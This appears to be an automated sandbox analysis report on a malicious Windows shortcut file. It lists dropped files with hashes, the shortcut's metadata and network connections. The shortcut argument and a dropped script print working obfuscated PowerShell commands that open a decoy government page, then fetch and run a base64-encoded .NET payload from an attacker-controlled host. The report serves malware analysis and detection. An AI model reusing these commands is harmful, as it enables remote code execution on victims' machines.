                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:ySuP55ohDL16el1gSogZoaRjL16elegSogZoal1:yS65SZL16e1HnpL16e8Hnj
                                                                                                                    MD5:0E1A6CFAD9FA713FA9D626EA9114B866
                                                                                                                    SHA1:96C1ADF3D6754840AA3CCF0F41495ABC91DB1054
                                                                                                                    SHA-256:14074F8BBFFD6E42CE4226FFF15F8CAD034D6FE4729FEA921F6F830317276E5D
                                                                                                                    SHA-512:36E9AB75132E1F72B54CB5BBBC222A29C0398395C89A8E5191F7396D21345E2942CEC336A3FEA32EED6BAC11E2C056A67127BD0D63252BBAD0155708ADECC4E7
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F. .. ...X.u.g....d..Y...X27.Y................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd.....0.g....d..Y.....j.2.....>YI. .JKSJTQ~1.LNK..N......EW.D>YI......$.....................>W.j.K.S.j.t.Q.8.W.7.O...l.n.k.......U...............-.......T..............y.....C:\Users\user\Desktop\jKSjtQ8W7O.lnk..9.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.`.......X.......632922...........hT..CrF.f4... ..C..Yc...,...E...hT..CrF.f4... ..C..Yc...,...E..........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....U$..f....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.D..Windows.@......OwH>YI.....3........................W.i.n.d.o.w.s.....Z.1.....>YF...Sy
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2677
                                                                                                                    Entropy (8bit):3.9809392474467282
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:8ooK0d3TvjbH8idAKZdA1oehwiZUklqehly+3:8XK03Pqy
                                                                                                                    MD5:62B9373847ED7AD7C00A6C070C0C2D1A
                                                                                                                    SHA1:62EDF9913854D9E6CA796790C835F3DB67BF26C6
                                                                                                                    SHA-256:783B5CF3FAB32040F523A322DB96568DF8F63CDC6B89CECFC643E6076D5FAA69
                                                                                                                    SHA-512:55AB1D7170FB3CA318104179BACC41502F966851BE37BCAE566404E5292A2665F7D002E8D27650DC8B02125756C623A2954A23A719FDF641CACC0EF7FDF8095E
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ...$+.,......x.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2679
                                                                                                                    Entropy (8bit):3.9928152268187103
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:8L0d3TvjbH8idAKZdA1leh/iZUkAQkqehay+2:8L03V9Qny
                                                                                                                    MD5:8CD6DCBC443EFC44F138733F876AA8E8
                                                                                                                    SHA1:78A3F97916E570384C91EE7A0E7E49E615D0AD6A
                                                                                                                    SHA-256:3BA196E2D0C200195EADA0B42985913F980342818390094DB8BBC59BB18A28AB
                                                                                                                    SHA-512:95FE3BAC87FD69F7BA5540CC57FD7440C93FDCFDD28C2CE06BD527D5176D9871AF99C8D16AA057C1DC23A344C0A8320CB65B76AC8B019D98A832A7AB82406244
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ...$+.,....j.h.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2693
                                                                                                                    Entropy (8bit):4.006442133107262
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:860d3TvjbH8idAKZdA14t5eh7sFiZUkmgqeh7sMy+BX:8603Vnmy
                                                                                                                    MD5:EFE49AF3495DD854F525F26FDA955EF3
                                                                                                                    SHA1:B6AAD46B6B119504D48D01BCFF6F924D544A6D27
                                                                                                                    SHA-256:D9C08263971E8FFD7C1564E506DDE722A8EF3F3F5D8AFB45E1D8C63FCF68DF60
                                                                                                                    SHA-512:9C761C6A92D03F361A66CCC2215A0DF809D333215130089EDEC55EDD84AD7117637FF84C0070F28EE937082D0136AA332346B468DC18FB7D0456560BF5EA2A40
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2681
                                                                                                                    Entropy (8bit):3.9937425256524244
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:8qK0d3TvjbH8idAKZdA16ehDiZUkwqehey+R:8b03Gky
                                                                                                                    MD5:4C7CB5694FEF42E46AEEAA86CA8B892E
                                                                                                                    SHA1:A2ECAA1C95ABC9999137514F80B14EEF9C499AB8
                                                                                                                    SHA-256:10478794C2A038C7CE776AF2159B852D20BC9EDEBF6B86E54EC027E8DC30A7A8
                                                                                                                    SHA-512:B670FDCDEC601308BF7F07E40E298DC0199A44C62875CABB4C26CA2776708C7433E0E213F8D210001D6A3D185EB446E28BE9AF46ABB0E2596206BDF3ED7336FE
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ...$+.,......`.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2681
                                                                                                                    Entropy (8bit):3.9830163484459318
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:8V0d3TvjbH8idAKZdA1UehBiZUk1W1qehoy+C:8V03G9Iy
                                                                                                                    MD5:16E3EBC74E955F3BD006067D60FFA5E3
                                                                                                                    SHA1:53E9BCBD7E27AC749DC5D4B0049FD4DE5A07A43B
                                                                                                                    SHA-256:B5226933B52CAB62C88576DCAE2801D68EDC32B537B7A1954D4D32C88CA26D90
                                                                                                                    SHA-512:6BB3CF363386DCBC197F7C2CC0627A11E9BC655A3CF1B3247517EBA999153E6AE4ECE6C57251EEBEDF9FF0BF792EA2A8FDD7CDEAEFED5495A0F35CD1442E0329
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ...$+.,....5.q.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Sep 30 15:58:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2683
                                                                                                                    Entropy (8bit):3.9923420153583473
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:8D0d3TvjbH8idAKZdA1duTrehOuTbbiZUk5OjqehOuTbmy+yT+:8D03XTYTbxWOvTbmy7T
                                                                                                                    MD5:976108D73A148D835AC8B7DF8360BE85
                                                                                                                    SHA1:A1961C50FF59E46C45AAD8B8A897ED1D9E0CF1C0
                                                                                                                    SHA-256:3591BF74C07E6660D04D5A308DE613D0DE1EF71828375A7D9685CA963177CE38
                                                                                                                    SHA-512:2BABFEF19C2FA08306DECB6DE8EA5748587FDA14423F32BBF4BC58ABD64840F00B04AE6DA1E104EB39D8707FCDB13BBD8B05097B2542DF69F0138AA5D1F127F0
                                                                                                                    Malicious:false
                                                                                                                    Preview:L..................F.@.. ...$+.,......V.Y...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.I>YL.....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V>YL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V>YL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V>YL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V>YN............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............y.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                    File Type:JSON data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):55
                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                    Malicious:false
                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                    Category:downloaded
                                                                                                                    Size (bytes):527
                                                                                                                    Entropy (8bit):4.801811297153848
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:J0+ox0UDWsRGDW8hsw4Aox1WR3oKcpRmsXtmIrgvRMKiSQe9uE7F50v+T:yiUDWsYDWus/q3oKcpRTXt+vEHK50v+
                                                                                                                    MD5:91B69177B0962BD96D0259982F719C13
                                                                                                                    SHA1:2928B4AFCB66355CE9EAEEA22C3B0EEAB451F67A
                                                                                                                    SHA-256:AECC7333C5335AA7B28DA1BE8EC4FFB4F64688FE496E17906A7D815024B920B5
                                                                                                                    SHA-512:B9215EC5B0AD38C32C05A0805A7AD38483756C5428B1B5033927109980A2A98725BBDB985ECE6BEDA6801305FE627FBFB6B14CA3C6C197FC6866A73A6BD95807
                                                                                                                    Malicious:false
                                                                                                                    URL:https://pmo.gov.pk/site/404
                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator at . root@localhost to inform them of the time this error occurred,. and the actions you performed just before this error.</p>.<p>More information about this error may be available.in the server error log.</p>.</body></html>.
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):258
                                                                                                                    Entropy (8bit):5.253795032079398
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:3P2XIpp+a6LKILbAWKCsu2xKvGz4g1L3ppNaA3gYZzI/HLN9yn:f2XIpUkIX7KC24gd3pjZdZE/rKn
                                                                                                                    MD5:3BFC25F8AB082D0F73CA42C0EE83B35E
                                                                                                                    SHA1:8CB2DC046512E25D5660C3BC88723886C1B52C0F
                                                                                                                    SHA-256:70F613B732D596F69B0871D154466FB5168DA255C451A5E69E31FF65CC6665A0
                                                                                                                    SHA-512:C534CD1B47173AE0F5B3690B960A4B0FDC479D3CF12EBA0C319327D4B3F1DB46896175E3848BF02A09266ED6405DE1ABD7FC5E36477AE36AABA680794AE6810A
                                                                                                                    Malicious:false
                                                                                                                    Preview:$string = irm ('http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/'); $bytees = [System.Convert]::FromBase64String($string.Replace('$','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('CheckLic');..
                                                                                                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed Feb 14 17:37:15 2024, mtime=Wed Aug 7 09:15:50 2024, atime=Wed Feb 14 17:37:15 2024, length=455680, window=hidenormalshowminimized
                                                                                                                    Entropy (8bit):4.3817665704973665
                                                                                                                    TrID:
                                                                                                                    • Windows Shortcut (20020/1) 100.00%
                                                                                                                    File name:jKSjtQ8W7O.lnk
                                                                                                                    File size:2'013 bytes
                                                                                                                    MD5:154af2b280309c99ae116841e1db5474
                                                                                                                    SHA1:db66323cd296d1571b8c1816c2fbefb474112e5e
                                                                                                                    SHA256:ffb1e4d9253ed97cc381826993a8812ac6c53f7a7d01793e282fc148102bdab3
                                                                                                                    SHA512:e846204139083b31915c389a8e8ab0d1de5b4daeb5909a8fc2d6ab3b54cd9f43076721a217905c4e26e6225da6335d0ad4bd78bb84252fb34ca12fd8291b353e
                                                                                                                    SSDEEP:24:8j+A9JilCQatK3sphWSO0MAbWt+/CWGX6RK4QTPNQTTvS7MReMtYqV8TJZTJpab5:8CaJ5lswLqX6RjvSQReMtBW3rat74
                                                                                                                    TLSH:E641882426F61708F5F28B3EA8777221493B7809C935DB8E029D80494B67A11E8B5F3B
                                                                                                                    File Content Preview:L..................F.... ....D7.t_.. j........A.t_...............................P.O. .:i.....+00.../C:\...................V.1......X.h..Windows.@........OwH.Y.L...........................~..W.i.n.d.o.w.s.....Z.1......Y.K..System32..B........OwH.Y.L......
                                                                                                                    Icon Hash:74f4f4dcece9e9ed

                                                                                                                    General

                                                                                                                    Relative Path:..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Command Line Argument: -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell
                                                                                                                    Icon location:%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Sep 30, 2024 18:58:14.782404900 CEST49673443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:14.938659906 CEST49672443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:17.329417944 CEST49676443192.168.2.852.182.143.211
                                                                                                                    Sep 30, 2024 18:58:19.724209070 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724239111 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724248886 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724260092 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724272013 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724330902 CEST4970780192.168.2.8217.20.57.18
                                                                                                                    Sep 30, 2024 18:58:19.724375963 CEST4970780192.168.2.8217.20.57.18
                                                                                                                    Sep 30, 2024 18:58:19.724430084 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724487066 CEST4970780192.168.2.8217.20.57.18
                                                                                                                    Sep 30, 2024 18:58:19.724828005 CEST8049707217.20.57.18192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:19.724924088 CEST4970780192.168.2.8217.20.57.18
                                                                                                                    Sep 30, 2024 18:58:19.954267979 CEST4967780192.168.2.8192.229.211.108
                                                                                                                    Sep 30, 2024 18:58:24.394479990 CEST49673443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:24.547982931 CEST49672443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:24.726592064 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:24.733218908 CEST8049708188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:24.733288050 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:24.903947115 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.074610949 CEST8049708188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.237471104 CEST8049708188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.292115927 CEST4970880192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.307483912 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.307540894 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.307601929 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.349230051 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.349266052 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.387310982 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:25.387357950 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.387414932 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:25.388428926 CEST49714443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:25.388442039 CEST44349714203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.388495922 CEST49714443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:25.389316082 CEST49714443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:25.389329910 CEST44349714203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.389484882 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:25.389497995 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.813328981 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.814428091 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.822438002 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.822455883 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.822896004 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:25.839638948 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:25.887403011 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:26.265007973 CEST4434970623.206.229.226192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:26.265255928 CEST49706443192.168.2.823.206.229.226
                                                                                                                    Sep 30, 2024 18:58:26.317559958 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:26.317653894 CEST44349712188.114.97.3192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:26.318592072 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:26.361201048 CEST49712443192.168.2.8188.114.97.3
                                                                                                                    Sep 30, 2024 18:58:27.115118027 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.115576029 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.115634918 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.115658045 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.115720987 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.115762949 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.115770102 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.116338968 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.116384983 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.119904995 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.170972109 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.204068899 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.210912943 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.210958004 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.211338997 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.211349964 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.217111111 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.217128992 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.510333061 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.551249027 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.988599062 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.988620043 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.988694906 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.989396095 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.989396095 CEST49713443192.168.2.8203.101.184.118
                                                                                                                    Sep 30, 2024 18:58:27.989418983 CEST44349713203.101.184.118192.168.2.8
                                                                                                                    Sep 30, 2024 18:58:27.989428997 CEST44349713203.101.184.118192.168.2.8
